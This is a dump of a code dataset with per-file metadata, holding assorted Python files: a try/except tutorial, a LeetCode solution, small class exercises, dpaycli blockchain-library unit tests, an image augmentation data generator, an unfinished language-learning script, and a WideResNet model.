blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
52fa7f6ab35d271fd30dbc1f96ddcee4a2df32b5 | e74c2e5b85b9af58a6f9b4b6eea160fb66f6bb08 | /aula11.py | a14bb8b989d099d4f7350a32cb0c4b75eb76c49b | []
| no_license | Nokutomi/AulaPython | 670cc27986aa3a12e528f5d1602929a524b632fc | 1e97e4821b12a0ad0a4438d682c1e4d61a10f61d | refs/heads/master | 2022-11-15T08:38:47.401055 | 2020-07-08T02:49:54 | 2020-07-08T02:49:54 | 275,640,239 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 657 | py |
lista = [1,10]
arquivo = open('teste.txt', 'r')
try:
texto = arquivo.read()
divisao = 10 / 0
# numero = lista[3]
# x = a
# print('Fechando arquivo')
# arquivo.close()
except ZeroDivisionError:
print('Nao e possivel realizar uma divisao por zero')
except ArithmeticError:
print('Houve um erro ao realizar uma operacao aritmetica')
except IndexError:
print('Erro ao acessar um indice invalido da lista')
except Exception as ex:
print('Erro desconhecido. Erro: {}'.format(ex))
else:
print('Executa quando nao ocorre excecao')
finally:
print('Sempre executa')
print('Fechando arquivo')
arquivo.close()
| [
"[email protected]"
]
| |
a02a2341ab021509e596e6ab801c9b00af24f937 | 988385035443e5d46d29d96b15179509fd1c782e | /addToArrayForm.py | ea09a01733d9a2d3d3b61c25a1837f7b7368545e | []
| no_license | mwoitek/leetcode-python3 | c120ee1b1eb8e17f3a301026f25c643be9852953 | eb9989d3768eba82275a57243c99796e74ccdd48 | refs/heads/master | 2022-12-28T21:19:51.215210 | 2020-10-18T06:17:27 | 2020-10-18T06:17:27 | 301,295,054 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | py | class Solution:
def addToArrayForm(self, A: List[int], K: int) -> List[int]:
A_str = "".join([str(num) for num in A])
A_int = int(A_str)
ans = A_int + K
ans_list = [int(char) for char in str(ans)]
return ans_list
| [
"[email protected]"
]
| |
7091c8bb4d092cb28c4a6f0d1fe1a329abcb2805 | 40b20d7e5f4381a64bd264a562c4ae6d6721b01c | /14-it-generator/sentence_gen.py | a17c48f6811da8c5180ec412bacbf4618080cabf | [
"MIT"
]
| permissive | KyrieCham/example-code | 7d2f0d5901bf80b49dd6b1e9ae1c37c9cb6df7f5 | 3dd11744d1c0b1f00860e985ee2a0761e73ef7e7 | refs/heads/master | 2020-04-18T00:56:06.384756 | 2019-01-22T19:27:43 | 2019-01-22T19:27:43 | 167,098,245 | 1 | 0 | MIT | 2019-01-23T01:52:48 | 2019-01-23T01:52:47 | null | UTF-8 | Python | false | false | 446 | py | """
Sentence: iterate over words using a generator function
"""
import re
import reprlib
RE_WORD = re.compile('\w+')
class Sentence:
def __init__(self, text):
self.text = text
self.words = RE_WORD.findall(text)
def __repr__(self):
return 'Sentence(%s)' % reprlib.repr(self.text)
def __iter__(self):
for word in self.words: # <1>
yield word # <2>
return # <3>
# done! <4>
| [
"[email protected]"
]
| |
c14cca36fd70f17c4adf7cf1050a549b485a5112 | dd44e145ac547209f5f209bc9b1f09189bb8b5c7 | /Python-OOP-July2021/04.Classes_and_objects-E/05.To-do-list/project/section.py | 391f64c88e1e7f0db3acc9df9b8d20c2de06a156 | []
| no_license | todorovventsi/Software-Engineering | e3c1be8f0f72c85619518bb914d2a4dbaac270f8 | 64ffa6c80b190e7c6f340aaf219986f769f175ab | refs/heads/master | 2023-07-09T05:35:14.522958 | 2021-08-15T14:35:55 | 2021-08-15T14:35:55 | 336,056,643 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,049 | py | class Section:
def __init__(self, name):
self.name = name
self.tasks = []
def add_task(self, new_task):
if new_task not in self.tasks:
self.tasks.append(new_task)
return f"Task {new_task.details()} is added to the section"
return f"Task is already in the section {self.name}"
def complete_task(self, task_name):
for task in self.tasks:
if task.name == task_name:
task.completed = True
return f"Completed task {task.name}"
return f"Could not find task with the name {task_name}"
def clean_section(self):
completed_tasks = 0
for task in self.tasks:
if task.completed:
completed_tasks += 1
self.tasks.remove(task)
return f"Cleared {completed_tasks} tasks."
def view_section(self):
first_row = f"Section {self.name}:\n"
next_rows = [f"{task.details()}\n" for task in self.tasks]
return f"{first_row}{''.join(next_rows)}"
| [
"[email protected]"
]
| |
f6f84dcc3656ac3c623fa8ecd4bfcedf2259c2ef | a22cc323b29f50da397d8363ac2521e3542a0fd7 | /tests/dpaycli/test_steem.py | d04f4ac3d9988e261ae2bc7c834ff2c3642c4d91 | [
"MIT"
]
| permissive | dpays/dpay-cli | 1a58c7dae45218e3b05b7e17ff5ce03e918d27b9 | dfa80898e1faea2cee92ebec6fe04873381bd40f | refs/heads/master | 2020-04-01T09:26:43.200933 | 2018-10-15T08:03:06 | 2018-10-15T08:03:06 | 153,075,154 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,444 | py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import range
from builtins import super
import mock
import string
import unittest
from parameterized import parameterized
import random
import json
from pprint import pprint
from dpaycli import DPay, exceptions
from dpaycli.amount import Amount
from dpaycli.memo import Memo
from dpaycli.version import version as dpaycli_version
from dpaycli.wallet import Wallet
from dpaycli.witness import Witness
from dpaycli.account import Account
from dpaycligraphenebase.account import PrivateKey
from dpaycli.instance import set_shared_dpay_instance
from dpaycli.nodelist import NodeList
# Py3 compatibility
import sys
wif = "5KQwrPbwdL6PhXujxW37FSSQZ1JiwsST4cqQzDeyXtP79zkvFD3"
class Testcases(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.nodelist = NodeList()
cls.nodelist.update_nodes(dpay_instance=DPay(node=cls.nodelist.get_nodes(normal=True, appbase=True), num_retries=10))
cls.bts = DPay(
node=cls.nodelist.get_nodes(),
nobroadcast=True,
unsigned=True,
data_refresh_time_seconds=900,
keys={"active": wif, "owner": wif, "memo": wif},
num_retries=10)
cls.testnet = DPay(
node="https://testnet.dpaydev.com",
nobroadcast=True,
unsigned=True,
data_refresh_time_seconds=900,
keys={"active": wif, "owner": wif, "memo": wif},
num_retries=10)
cls.account = Account("test", full=True, dpay_instance=cls.bts)
cls.account_testnet = Account("test", full=True, dpay_instance=cls.testnet)
@parameterized.expand([
("normal"),
("testnet"),
])
def test_transfer(self, node_param):
if node_param == "normal":
bts = self.bts
acc = self.account
elif node_param == "testnet":
bts = self.testnet
acc = self.account_testnet
acc.dpay.txbuffer.clear()
tx = acc.transfer(
"test", 1.33, "BBD", memo="Foobar", account="test1")
self.assertEqual(
tx["operations"][0][0],
"transfer"
)
self.assertEqual(len(tx["operations"]), 1)
op = tx["operations"][0][1]
self.assertIn("memo", op)
self.assertEqual(op["memo"], "Foobar")
self.assertEqual(op["from"], "test1")
self.assertEqual(op["to"], "test")
amount = Amount(op["amount"], dpay_instance=bts)
self.assertEqual(float(amount), 1.33)
def test_create_account(self):
bts = DPay(node=self.nodelist.get_nodes(),
nobroadcast=True,
unsigned=True,
data_refresh_time_seconds=900,
keys={"active": wif, "owner": wif, "memo": wif},
num_retries=10)
core_unit = "DWB"
name = ''.join(random.choice(string.ascii_lowercase) for _ in range(12))
key1 = PrivateKey()
key2 = PrivateKey()
key3 = PrivateKey()
key4 = PrivateKey()
key5 = PrivateKey()
bts.txbuffer.clear()
tx = bts.create_account(
name,
creator="test", # 1.2.7
owner_key=format(key1.pubkey, core_unit),
active_key=format(key2.pubkey, core_unit),
posting_key=format(key3.pubkey, core_unit),
memo_key=format(key4.pubkey, core_unit),
additional_owner_keys=[format(key5.pubkey, core_unit)],
additional_active_keys=[format(key5.pubkey, core_unit)],
additional_posting_keys=[format(key5.pubkey, core_unit)],
additional_owner_accounts=["test1"], # 1.2.0
additional_active_accounts=["test1"],
storekeys=False,
)
self.assertEqual(
tx["operations"][0][0],
"account_create"
)
op = tx["operations"][0][1]
role = "active"
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
"test1",
[x[0] for x in op[role]["account_auths"]])
role = "posting"
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
"test1",
[x[0] for x in op[role]["account_auths"]])
role = "owner"
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
"test1",
[x[0] for x in op[role]["account_auths"]])
self.assertEqual(
op["creator"],
"test")
def test_create_account_password(self):
bts = DPay(node=self.nodelist.get_nodes(),
nobroadcast=True,
unsigned=True,
data_refresh_time_seconds=900,
keys={"active": wif, "owner": wif, "memo": wif},
num_retries=10)
core_unit = "DWB"
name = ''.join(random.choice(string.ascii_lowercase) for _ in range(12))
key5 = PrivateKey()
bts.txbuffer.clear()
tx = bts.create_account(
name,
creator="test", # 1.2.7
password="abcdefg",
additional_owner_keys=[format(key5.pubkey, core_unit)],
additional_active_keys=[format(key5.pubkey, core_unit)],
additional_posting_keys=[format(key5.pubkey, core_unit)],
additional_owner_accounts=["test1"], # 1.2.0
additional_active_accounts=["test1"],
storekeys=False,
)
self.assertEqual(
tx["operations"][0][0],
"account_create"
)
op = tx["operations"][0][1]
role = "active"
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
"test1",
[x[0] for x in op[role]["account_auths"]])
role = "owner"
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
format(key5.pubkey, core_unit),
[x[0] for x in op[role]["key_auths"]])
self.assertIn(
"test1",
[x[0] for x in op[role]["account_auths"]])
self.assertEqual(
op["creator"],
"test")
@parameterized.expand([
("normal"),
("testnet"),
])
def test_connect(self, node_param):
if node_param == "normal":
bts = self.bts
elif node_param == "testnet":
bts = self.testnet
bts.connect()
@parameterized.expand([
("normal"),
("testnet"),
])
def test_info(self, node_param):
if node_param == "normal":
bts = self.bts
elif node_param == "testnet":
bts = self.testnet
info = bts.info()
for key in ['current_witness',
'head_block_id',
'head_block_number',
'id',
'last_irreversible_block_num',
'current_witness',
'total_pow',
'time']:
self.assertTrue(key in info)
def test_finalizeOps(self):
bts = self.bts
acc = self.account
tx1 = bts.new_tx()
tx2 = bts.new_tx()
acc.transfer("test1", 1, "BEX", append_to=tx1)
acc.transfer("test1", 2, "BEX", append_to=tx2)
acc.transfer("test1", 3, "BEX", append_to=tx1)
tx1 = tx1.json()
tx2 = tx2.json()
ops1 = tx1["operations"]
ops2 = tx2["operations"]
self.assertEqual(len(ops1), 2)
self.assertEqual(len(ops2), 1)
@parameterized.expand([
("normal"),
("testnet"),
])
def test_weight_threshold(self, node_param):
if node_param == "normal":
bts = self.bts
pkey1 = 'DWB55VCzsb47NZwWe5F3qyQKedX9iHBHMVVFSc96PDvV7wuj7W86n'
pkey2 = 'DWB7GM9YXcsoAJAgKbqW2oVj7bnNXFNL4pk9NugqKWPmuhoEDbkDv'
elif node_param == "testnet":
bts = self.testnet
pkey1 = 'TST55VCzsb47NZwWe5F3qyQKedX9iHBHMVVFSc96PDvV7wuj7W86n'
pkey2 = 'TST7GM9YXcsoAJAgKbqW2oVj7bnNXFNL4pk9NugqKWPmuhoEDbkDv'
auth = {'account_auths': [['test', 1]],
'extensions': [],
'key_auths': [
[pkey1, 1],
[pkey2, 1]],
'weight_threshold': 3} # threshold fine
bts._test_weights_treshold(auth)
auth = {'account_auths': [['test', 1]],
'extensions': [],
'key_auths': [
[pkey1, 1],
[pkey2, 1]],
'weight_threshold': 4} # too high
with self.assertRaises(ValueError):
bts._test_weights_treshold(auth)
@parameterized.expand([
("normal"),
("testnet"),
])
def test_allow(self, node_param):
if node_param == "normal":
bts = self.bts
acc = self.account
prefix = "DWB"
wif = "DWB55VCzsb47NZwWe5F3qyQKedX9iHBHMVVFSc96PDvV7wuj7W86n"
elif node_param == "testnet":
bts = self.testnet
acc = self.account_testnet
prefix = "TST"
wif = "TST55VCzsb47NZwWe5F3qyQKedX9iHBHMVVFSc96PDvV7wuj7W86n"
self.assertIn(bts.prefix, prefix)
tx = acc.allow(
wif,
account="test",
weight=1,
threshold=1,
permission="owner",
)
self.assertEqual(
(tx["operations"][0][0]),
"account_update"
)
op = tx["operations"][0][1]
self.assertIn("owner", op)
self.assertIn(
[wif, '1'],
op["owner"]["key_auths"])
self.assertEqual(op["owner"]["weight_threshold"], 1)
def test_disallow(self):
acc = self.account
pkey1 = "DWB55VCzsb47NZwWe5F3qyQKedX9iHBHMVVFSc96PDvV7wuj7W86n"
pkey2 = "DWB6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV"
if sys.version > '3':
_assertRaisesRegex = self.assertRaisesRegex
else:
_assertRaisesRegex = self.assertRaisesRegexp
with _assertRaisesRegex(ValueError, ".*Changes nothing.*"):
acc.disallow(
pkey1,
weight=1,
threshold=1,
permission="owner"
)
with _assertRaisesRegex(ValueError, ".*Changes nothing!.*"):
acc.disallow(
pkey2,
weight=1,
threshold=1,
permission="owner"
)
def test_update_memo_key(self):
acc = self.account
prefix = "DWB"
pkey = 'DWB55VCzsb47NZwWe5F3qyQKedX9iHBHMVVFSc96PDvV7wuj7W86n'
self.assertEqual(acc.dpay.prefix, prefix)
acc.dpay.txbuffer.clear()
tx = acc.update_memo_key(pkey)
self.assertEqual(
(tx["operations"][0][0]),
"account_update"
)
op = tx["operations"][0][1]
self.assertEqual(
op["memo_key"],
pkey)
@parameterized.expand([
("normal"),
("testnet"),
])
def test_approvewitness(self, node_param):
if node_param == "normal":
w = self.account
elif node_param == "testnet":
w = self.account_testnet
w.dpay.txbuffer.clear()
tx = w.approvewitness("test1")
self.assertEqual(
(tx["operations"][0][0]),
"account_witness_vote"
)
op = tx["operations"][0][1]
self.assertIn(
"test1",
op["witness"])
def test_post(self):
bts = self.bts
bts.txbuffer.clear()
tx = bts.post("title", "body", author="test", permlink=None, reply_identifier=None,
json_metadata=None, comment_options=None, community="test", tags=["a", "b", "c", "d", "e"],
beneficiaries=[{'account': 'test1', 'weight': 5000}, {'account': 'test2', 'weight': 5000}], self_vote=True)
self.assertEqual(
(tx["operations"][0][0]),
"comment"
)
op = tx["operations"][0][1]
self.assertEqual(op["body"], "body")
self.assertEqual(op["title"], "title")
self.assertEqual(op["permlink"], "title")
self.assertEqual(op["parent_author"], "")
self.assertEqual(op["parent_permlink"], "a")
json_metadata = json.loads(op["json_metadata"])
self.assertEqual(json_metadata["tags"], ["a", "b", "c", "d", "e"])
self.assertEqual(json_metadata["app"], "dpaycli/%s" % (dpaycli_version))
self.assertEqual(
(tx["operations"][1][0]),
"comment_options"
)
op = tx["operations"][1][1]
self.assertEqual(len(op['extensions'][0][1]['beneficiaries']), 2)
def test_comment_option(self):
bts = self.bts
bts.txbuffer.clear()
tx = bts.comment_options({}, "@gtg/witness-gtg-log", account="test")
self.assertEqual(
(tx["operations"][0][0]),
"comment_options"
)
op = tx["operations"][0][1]
self.assertIn(
"gtg",
op["author"])
self.assertEqual('1000000.000 BBD', op["max_accepted_payout"])
self.assertEqual(10000, op["percent_dpay_dollars"])
self.assertEqual(True, op["allow_votes"])
self.assertEqual(True, op["allow_curation_rewards"])
self.assertEqual("witness-gtg-log", op["permlink"])
def test_online(self):
bts = self.bts
self.assertFalse(bts.get_blockchain_version() == '0.0.0')
def test_offline(self):
bts = DPay(node=self.nodelist.get_nodes(),
offline=True,
data_refresh_time_seconds=900,
keys={"active": wif, "owner": wif, "memo": wif})
bts.refresh_data()
self.assertTrue(bts.get_reserve_ratio(use_stored_data=False) is None)
self.assertTrue(bts.get_reserve_ratio(use_stored_data=True) is None)
self.assertTrue(bts.get_feed_history(use_stored_data=False) is None)
self.assertTrue(bts.get_feed_history(use_stored_data=True) is None)
self.assertTrue(bts.get_reward_funds(use_stored_data=False) is None)
self.assertTrue(bts.get_reward_funds(use_stored_data=True) is None)
self.assertTrue(bts.get_current_median_history(use_stored_data=False) is None)
self.assertTrue(bts.get_current_median_history(use_stored_data=True) is None)
self.assertTrue(bts.get_hardfork_properties(use_stored_data=False) is None)
self.assertTrue(bts.get_hardfork_properties(use_stored_data=True) is None)
self.assertTrue(bts.get_network(use_stored_data=False) is None)
self.assertTrue(bts.get_network(use_stored_data=True) is None)
self.assertTrue(bts.get_witness_schedule(use_stored_data=False) is None)
self.assertTrue(bts.get_witness_schedule(use_stored_data=True) is None)
self.assertTrue(bts.get_config(use_stored_data=False) is None)
self.assertTrue(bts.get_config(use_stored_data=True) is None)
self.assertEqual(bts.get_block_interval(), 3)
self.assertEqual(bts.get_blockchain_version(), '0.0.0')
@parameterized.expand([
("normal"),
("testnet"),
])
def test_properties(self, node_param):
if node_param == "normal":
bts = DPay(node=self.nodelist.get_nodes(),
nobroadcast=True,
data_refresh_time_seconds=900,
keys={"active": wif, "owner": wif, "memo": wif},
num_retries=10)
elif node_param == "testnet":
bts = DPay(node="https://testnet.dpaydev.com",
nobroadcast=True,
data_refresh_time_seconds=900,
keys={"active": wif, "owner": wif, "memo": wif},
num_retries=10)
self.assertTrue(bts.get_reserve_ratio(use_stored_data=False) is not None)
self.assertTrue(bts.get_feed_history(use_stored_data=False) is not None)
self.assertTrue(bts.get_reward_funds(use_stored_data=False) is not None)
self.assertTrue(bts.get_current_median_history(use_stored_data=False) is not None)
self.assertTrue(bts.get_hardfork_properties(use_stored_data=False) is not None)
self.assertTrue(bts.get_network(use_stored_data=False) is not None)
self.assertTrue(bts.get_witness_schedule(use_stored_data=False) is not None)
self.assertTrue(bts.get_config(use_stored_data=False) is not None)
self.assertTrue(bts.get_block_interval() is not None)
self.assertTrue(bts.get_blockchain_version() is not None)
def test_bp_to_rshares(self):
stm = self.bts
rshares = stm.bp_to_rshares(stm.vests_to_sp(1e6))
self.assertTrue(abs(rshares - 20000000000.0) < 2)
def test_rshares_to_vests(self):
stm = self.bts
rshares = stm.bp_to_rshares(stm.vests_to_sp(1e6))
rshares2 = stm.vests_to_rshares(1e6)
self.assertTrue(abs(rshares - rshares2) < 2)
def test_bp_to_bbd(self):
stm = self.bts
bp = 500
ret = stm.bp_to_bbd(bp)
self.assertTrue(ret is not None)
def test_bbd_to_rshares(self):
stm = self.bts
test_values = [1, 10, 100, 1e3, 1e4, 1e5, 1e6, 1e7]
for v in test_values:
try:
bbd = round(stm.rshares_to_bbd(stm.bbd_to_rshares(v)), 5)
except ValueError: # Reward pool smaller than 1e7 BBD (e.g. caused by a very low BEX price)
continue
self.assertEqual(bbd, v)
def test_rshares_to_vote_pct(self):
stm = self.bts
bp = 1000
voting_power = 9000
for vote_pct in range(500, 10000, 500):
rshares = stm.bp_to_rshares(bp, voting_power=voting_power, vote_pct=vote_pct)
vote_pct_ret = stm.rshares_to_vote_pct(rshares, dpay_power=bp, voting_power=voting_power)
self.assertEqual(vote_pct_ret, vote_pct)
def test_sign(self):
bts = self.bts
with self.assertRaises(
exceptions.MissingKeyError
):
bts.sign()
def test_broadcast(self):
bts = self.bts
bts.txbuffer.clear()
tx = bts.comment_options({}, "@gtg/witness-gtg-log", account="test")
# tx = bts.sign()
with self.assertRaises(
exceptions.MissingKeyError
):
bts.broadcast(tx=tx)
| [
"[email protected]"
]
| |
9999bf5d93fa20451f61973a2e0ae14307aded8d | 4b1cf07275a8f2abf30943b975d443485ef897ff | /data_generator.py | 3805e30c71100e78de5cec92ba0c561a77bb426d | [
"MIT"
]
| permissive | gipsyblues/edge_ml_emotion_recognition | a0e1e0acc98d11f710542218b2603f72a8a93a4b | 028e9a9264e7df5c48a047677b48f0c15e059e6c | refs/heads/master | 2023-06-27T02:53:18.707806 | 2021-07-28T06:48:30 | 2021-07-28T06:48:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,108 | py | import numpy as np
import cv2
import os
import imgaug as ia
import logging
from imgaug import augmenters as iaa
from imgaug.augmentables.segmaps import SegmentationMapsOnImage
from imgaug.augmentables.bbs import BoundingBox, BoundingBoxesOnImage
def _create_augment_pipeline():
sometimes = lambda aug: iaa.Sometimes(0.1, aug)
aug_pipe = iaa.Sequential(
[
iaa.Fliplr(0.5),
#iaa.Flipud(0.2),
iaa.Affine(translate_percent={"x": (-0.1, 0.1), "y": (-0.1, 0.1)}),
iaa.OneOf([iaa.Affine(scale=(0.8, 1.2)),
iaa.Affine(rotate=(-10, 10)),
iaa.Affine(shear=(-10, 10))]),
sometimes(iaa.OneOf([
iaa.GaussianBlur((0, 3.0)),
iaa.AverageBlur(k=(2, 7)),
iaa.MedianBlur(k=(3, 11)),
])),
sometimes(iaa.Sharpen(alpha=(0, 1.0), lightness=(0.75, 1.5))),
sometimes(iaa.AdditiveGaussianNoise(loc=0, scale=(0.0, 0.05 * 255), per_channel=0.5)),
sometimes(iaa.OneOf([
iaa.Dropout((0.01, 0.1), per_channel=0.5),
iaa.CoarseDropout((0.03, 0.15), size_percent=(0.02, 0.05), per_channel=0.2),
])),
sometimes(iaa.Add((-10, 10), per_channel=0.5)),
sometimes(iaa.Multiply((0.5, 1.5), per_channel=0.5)),
sometimes(iaa.ContrastNormalization((0.5, 2.0), per_channel=0.5))
],
random_order=True
)
return aug_pipe
def process_image_classification(image, desired_w = None, desired_h = None, aug_pipe = None):
# resize the image to standard size
if (desired_w and desired_h) or aug_pipe:
if (desired_w and desired_h):
# Rescale image
image = ia.imresize_single_image(image, (desired_w, desired_h))
if aug_pipe:
image = aug_pipe(image=image)
return image
class DataGenerator():
def __init__(self, X_train, y_train, batch_size=32, img_size = 48, prefix='appa-real/imgs/', shuffle=True, augment=None):
self.X_train = X_train
self.y_train = y_train
self.batch_size = batch_size
self.img_size = img_size
self.prefix = prefix
self.class_num = y_train.shape[1]
self.shuffle = shuffle
self.sample_num = len(X_train)
self.augment = augment
if self.augment:
logging.info("Using augmentation for {self.prefix}")
self.aug_pipe = _create_augment_pipeline()
def __call__(self):
while True:
indexes = self.__get_exploration_order()
itr_num = int(len(indexes) // (self.batch_size * 2))
for i in range(itr_num):
batch_ids = indexes[i * self.batch_size * 2:(i + 1) * self.batch_size * 2]
X, y = self.__data_generation(batch_ids)
yield X, y
def __get_exploration_order(self):
indexes = np.arange(self.sample_num)
if self.shuffle:
np.random.shuffle(indexes)
return indexes
def __data_generation(self, batch_ids):
X = np.zeros(shape=(self.batch_size, self.img_size, self.img_size, 3))
y = np.zeros(shape=(self.batch_size, self.class_num))
for i in range(self.batch_size):
img = cv2.imread(self.prefix + self.X_train[batch_ids[i]], 1)
try:
if self.augment:
img = process_image_classification(img, self.img_size, self.img_size, self.aug_pipe)
except Exception as e:
print(self.prefix + self.X_train[batch_ids[i]], e)
img = img.astype(np.float32)
img /= 255.
img -= 0.5
img *= 2.
img = img[:, :, ::-1]
X[i, ::] = img
y[i, :] = self.y_train[batch_ids[i]]
return np.array(X), y
| [
"[email protected]"
]
| |
ca9547928ab7a957dabd169f16fc201dc6d06efe | b83ff584bfcd9fce7a337ba1253287fc9afd03c7 | /cmdline_fluency_countdown.py | c6564c0a2aa5dcf88e15805c147edba2570aebac | []
| no_license | houstonhunt/fluencycountdown | 6166eaf625f6e348213dcd5be8045ee218159900 | d555b83972e05d09e1caafca61ea465c4ca3770c | refs/heads/master | 2021-01-23T23:12:17.392090 | 2015-05-23T18:48:24 | 2015-05-23T18:48:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,720 | py | #!/usr/bin/python
# cmdline_fluency_countdown.py
import pickle # used to save user progress (currently supporting 1 primary user)
import ConfigParser, os # used to parse language file
def init():
state = 0
try:
pickle.load(open("save.p", "rb"))
print "SUCCESS: loaded save file!"
state = 1
except:
config = ConfigParser.ConfigParser()
config.read('lang.cfg')
print "WELCOME: no save file found!"
print "Type a [language] you want to learn (example: English),"
print " or [list] then press [ENTER]"
selected_lang = raw_input()
# joke
if selected_lang == "English":
print "You already know English!"
quit()
elif selected_lang == "list":
list(selected_lang, config)
elif selected_language ==
def list(what, cp):
if what == "list":
print "list what? [all] [easy] [medium] [hard] [other] [about]"
selected_lang = raw_input()
if selected_lang == "all":
list1(cp)
list2(cp)
list3(cp)
listo(cp)
elif selected_lang == "easy":
list1(cp)
elif selected_lang == "medium":
list2(cp)
elif selected_lang == "hard":
list3(cp)
elif selected_lang == "other":
listo(cp)
elif selected_lang == "about":
print "Coded by Houston Hunt"
print "Times to mastering a language for English speakers"
print "is given by " + str(cp.get('Reference', 'reference'))
def list1(cp):
print cp.get('Languages', 'desc1')
print str(cp.get('Languages', 'cat1'))
def list2(cp):
print str(cp.get('Languages', 'desc2'))
print str(cp.get('Languages', 'cat2'))
def list3(cp):
print str(cp.get('Languages', 'desc3'))
print str(cp.get('Languages', 'cat3'))
def listo(cp):
print str(cp.get('Languages', 'desco'))
print str(cp.get('Languages', 'other'))
init()
| [
"[email protected]"
]
| |
09db4be45d5d63793dcd85353daabc9d84d3ac5d | 08ca7028e0488c420fff8c831e9d4fd3e32ee292 | /models/wideresnet.py | 59ba6496518eab9bc92f85bceb9a2459910e4762 | []
| no_license | yogeshbalaji/Adversarial-training | 0ee53fdbef2742788cbbc73ca592738347076fe2 | 3593c836f39c1313545fcc71e5ba8afa6f427326 | refs/heads/master | 2020-07-15T03:00:26.425582 | 2019-09-04T19:59:51 | 2019-09-04T19:59:51 | 205,464,494 | 12 | 4 | null | null | null | null | UTF-8 | Python | false | false | 3,517 | py | from collections import OrderedDict
import torch
from torch import nn
import torch.nn.functional as F
from utils import data_normalize
def init_weight(*args):
return nn.Parameter(nn.init.kaiming_normal_(torch.zeros(*args), mode='fan_out', nonlinearity='relu'))
class Block(nn.Module):
"""
Pre-activated ResNet block.
"""
def __init__(self, width):
super().__init__()
self.bn0 = nn.BatchNorm2d(width, affine=False)
self.register_parameter('conv0', init_weight(width, width, 3, 3))
self.bn1 = nn.BatchNorm2d(width, affine=False)
self.register_parameter('conv1', init_weight(width, width, 3, 3))
def forward(self, x):
h = F.conv2d(F.relu(self.bn0(x)), self.conv0, padding=1)
h = F.conv2d(F.relu(self.bn1(h)), self.conv1, padding=1)
return x + h
class DownsampleBlock(nn.Module):
"""
Downsample block.
Does F.avg_pool2d + torch.cat instead of strided conv.
"""
def __init__(self, width):
super().__init__()
self.bn0 = nn.BatchNorm2d(width // 2, affine=False)
self.register_parameter('conv0', init_weight(width, width // 2, 3, 3))
self.bn1 = nn.BatchNorm2d(width, affine=False)
self.register_parameter('conv1', init_weight(width, width, 3, 3))
def forward(self, x):
h = F.conv2d(F.relu(self.bn0(x)), self.conv0, padding=1, stride=2)
h = F.conv2d(F.relu(self.bn1(h)), self.conv1, padding=1)
x_d = F.avg_pool2d(x, kernel_size=3, padding=1, stride=2)
x_d = torch.cat([x_d, torch.zeros_like(x_d)], dim=1)
return x_d + h
class WRN(nn.Module):
"""
Implementation of modified Wide Residual Network.
Differences with pre-activated ResNet and Wide ResNet:
* BatchNorm has no affine weight and bias parameters
* First layer has 16 * width channels
* Last fc layer is removed in favor of 1x1 conv + F.avg_pool2d
* Downsample is done by F.avg_pool2d + torch.cat instead of strided conv
First and last convolutional layers are kept in float32.
"""
def __init__(self, depth, width, num_classes):
super().__init__()
widths = [int(v * width) for v in (16, 32, 64)]
n = (depth - 2) // 6
self.register_parameter('conv0', init_weight(widths[0], 3, 3, 3))
self.group0 = self._make_block(widths[0], n)
self.group1 = self._make_block(widths[1], n, downsample=True)
self.group2 = self._make_block(widths[2], n, downsample=True)
self.bn = nn.BatchNorm2d(widths[2], affine=False)
self.register_parameter('conv_last', init_weight(num_classes, widths[2], 1, 1))
self.bn_last = nn.BatchNorm2d(num_classes)
self.mean = [125.3 / 255.0, 123.0 / 255.0, 113.9 / 255.0]
self.std = [63.0 / 255.0, 62.1 / 255.0, 66.7 / 255.0]
def _make_block(self, width, n, downsample=False):
def select_block(j):
if downsample and j == 0:
return DownsampleBlock(width)
return Block(width)
return nn.Sequential(OrderedDict(('block%d' % i, select_block(i)) for i in range(n)))
def forward(self, x):
x = data_normalize(x, self.mean, self.std)
h = F.conv2d(x, self.conv0, padding=1)
h = self.group0(h)
h = self.group1(h)
h = self.group2(h)
h = F.relu(self.bn(h))
h = F.conv2d(h, self.conv_last)
h = self.bn_last(h)
